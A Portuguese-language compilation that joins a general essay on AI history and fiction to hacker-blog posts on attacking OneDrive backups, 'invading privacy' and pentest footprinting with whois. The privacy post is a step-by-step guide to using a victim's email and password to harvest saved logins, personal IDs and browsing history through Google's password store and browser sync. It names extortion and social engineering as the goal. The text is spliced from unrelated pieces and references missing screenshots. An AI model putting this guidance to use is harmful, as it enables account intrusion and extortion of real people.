Iniciada dos anos 1940, a pesquisa em torno desta incipiente ciência eram desenvolvidas apenas para procurar encontrar novas funcionalidades para o computador, ainda em projeto. Com o advento da Segunda Guerra Mundial, surgiu também a necessidade de desenvolver a tecnologia para impulsionar a indústria bélica.

Com o passar do tempo, surgem várias linhas de estudo da IA, uma delas é a biológica, que estuda o desenvolvimento de conceitos que pretendiam imitar as redes neurais humanas. Na verdade, é nos anos 60 em que esta ciência recebe a alcunha de Inteligência Artificial e os pesquisadores da linha biológica acreditavam ser possível máquinas realizarem tarefas humanas complexas, como raciocinar.

Depois de um período negro, os estudos sobre redes neurais volta à tona nos anos 1980, mas é nos anos de 1990 que ela tem um grande impulso, consolidando-a verdadeiramente como a base dos estudos da IA.

IA na vida real

Hoje em dia, são várias as aplicações na vida real da Inteligência Artificial: jogos, programas de computador, aplicativos de segurança para sistemas informacionais, robótica (robôs auxiliares), dispositivos para reconhecimentos de escrita a mão e reconhecimento de voz, programas de diagnósticos médicos e muito mais.

IA na ficção

Um tema bastante recorrente em histórias de ficção científica, a Inteligência Artificial está presente em livros, desenhos animados e filmes. Um autor de grande destaque nesta área é o russo Isaac Asimov, autor de histórias de sucesso como O Homem Bicentenário e Eu, Robô. Ambas receberam adaptação para o cinema. Outra história que caiu nas graças do público foi AI: Inteligência Artificial, dirigido por Steven Spielberg.

Porém, nem tudo são flores na visão daqueles que levam a IA para a ficção. Filmes como 2001: Uma Odisséia no Espaço, dirigido por Stanley Kubrick, Matrix, de Andy e Larry Wachowski, e Exterminador do Futuro, dirigido por James Cameron, mostram como a humanidade pode ser subjugada por máquinas que conseguem pensar como o ser humano e ser mais frias e indiferentes a vida do que seus semelhantes de carne e osso.

A controvérsia

Baseando-se em histórias fictícias como as citadas anteriormente, não é difícil imaginar o caos que poderá ser causado por seres de metal, com um enorme poder físico e de raciocínio, agindo independentemente da vontade humana. Guerras desleais, escravidão e até mesmo a extinção da humanidade estão no rol das conseqüências da IA.

Por outro lado, robôs inteligentes podem ser de grande utilidade na medicina, diminuindo o número de erros médicos, na exploração de outros planetas, no resgate de pessoas soterradas por escombros, além de sistemas inteligentes para resolver cálculos e realizar pesquisas que poderão encontrar cura de doenças. Como pode ser notado, a Inteligência Artificial é um tema complexo e bastante controverso. São diversos os pontos a favor e contra e cada lado tem razão em suas afirmações. Cabe a nós esperar que, independente dos rumos que os estudos sobre IA tomem, eles sejam guiados pela ética e pelo bom senso.

SEGURANÇA EM BACKUP

E ae galera, vocês estão protegidos com os seus arquivos na nuvem?

Imagine se o atacante colocou um arquivo malicioso em sua conta de backup (Dropbox, ADrive, Google Drive e entre outros) .

Esse tipo de ataque acontece em servidores da OneDrive que já vem instalado nos sistemas operacionais Windows.

O OneDrive é um serviço de armazenamento na nuvem da Microsoft que oferece a opção de guardar até 7 GB de arquivos grátis na rede. 


Sabendo apenas o login do email, o atacante consegue acesso a pasta OneDrive do sistema alvo.  



Como estou apenas demonstrando uma invasão, loguei em minha conta, parece que temos apenas uma pasta com 680KB.
Agora imagine uma conta com vários documentos, planilhas, fotos, arquivos importantes.

Aqui vemos algumas opções dele, como de upload (aqui o atacante poder upar o arquivo malicioso). 


Alguns dos meus arquivos que eu deixei salvo, que podem ser facilmente manipulados (principalmente arquivos .docx e entre outros do pacote office)
Citação: https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-529/Microsoft-Word.html

INVADINDO A PRIVACIDADE

E ae galera, fiz esse tutorial mostrando como obter diversas informações pessoais de alguem.
O que vamos precisar:

Um email e senha.

Bom, a primeira coisa que eu fiz quando eu peguei o email foi verificar onde ele cadastrado.

Fui em 3 lugares:
1. Contas em redes sociais

2. Gmail/Hotmail/Yahoo

3. Verificar se ele tem backup em algum navegador (sync)

Entrei na conta do Gmail e lembrei que o Google disponibiliza sites onde foram salva as senhas:



Esses foram alguns sites que estavam com o login salvo (com outros emails, cpfs e etc).

Para verificar se a vitima tem logins em outros sites, nós podemos usar algum browser com a opção de sync.


A opção de sync também nós mostra logins em outros sites e também históricos.

Com isso, alguém mal-intencionado pode fazer qualquer coisa, vai de engenharia social a extorsão.

ENTENDA O QUE É FOOTPRINTING

E ae gelera, hoje vamos falar sobre footprinting.

A coleta de informações (ou footprinting) é a primeira etapa que deve ocorrer em um pentest. O reconhecimento consiste em obter todas as informações a respeito da rede (topologia, mapeamento, servidores, funcionários etc.). Quanto mais informações coletadas, maior a probabilidade de acesso ao sistema auditado.

Todas as informações relacionadas ao segmento da empresa - servidores, roteadores, firewalls, hábitos dos funcionários e sua capacitação, pessoas relacionadas á empresa, empresas terceirizadas, emails, facebook, telefones, informações jogadas no lixo etc. - auxiliam ao processo de coleta de informações.

Podemos aplicar a engenharia social, a qual contribuirá de forma significativa com o aumento das informações pesquisadas. Por meio das informações do Google, do Yahoo e de outros mecanismo de busca, em poucas horas conseguimos uma gama de informações que potencializa o teste de intrusão.

Um bom inicio para coletar informações é começar pesquisando no site alvo. Comece lendo o site, veja quais são os dominios associados etc. Obtenha o maximo de informações que conseguir. Com certeza o leitor encontrará emails de contato, nomes relacionados á administração e outras informações bem interessantes. Com essas informações é possivel criar uma lista de palavras que servirá para futuros ataques (como quebra de sistemas de login - HTTP, SMTP, WPA2 etc). Acredite, sites revelam muitas informações a respeito do nosso alvo, vale a pena checá-lo. Uma dica que lhe dou é também buscar informações do site em repositorios como o archive.org. O Passado de um site é revelado.

Com as informações básicas enumeradas, o próximo passo para montarmos o nosso plano de ataque é coletar informações a respeito do domínio a ser testado. O domínio vai exibir dados públicos que podem ser de interesse para atacantes. Realizado uma busca no domínio do nosso alvo, obtemos informações como email do responsável, servidores DNS (que serão utilizados para enumeração DNS e transferência de zona), país etc. O comando whois do Linux pode ser usado para buscar e enumerar informações de um domínio em órgãos regulamentadores. Mas antes de de utilizá-lo, vamos entender como funciona a estrutura de domínios na internet.
Cada país possui um órgão regulamentar de domínios. Por exemplo, no Brasil, o responsável por regulamentar o domínio é o registro.br. Cada órgão regulamentador é controlado por uma entidade superior. Por exemplo, o registro.br é vinculado ao Lacnic (Entidade responsável pelo gerenciamento de domínios da América Latina. O órgão responsável pelo gerenciamento de todos os continentes é p IANA (a futura organização será a ICANN). 


Abra o seu terminal e digite: 
whois www.site.com.br

Exemplo: whois www.microsoft.com.br 




As informações básicas são exibidas (servidores DNS, a pessoa responsável por aquele domínio juntamente com o email dela), será necessário realizara enumeração DNS. A enumeração DNS é um passo importante para o mapeamento da infraestrutura da rede, pois com o DNS podemos descobrir quais são os domínios que respondem por qual faixa de IPs.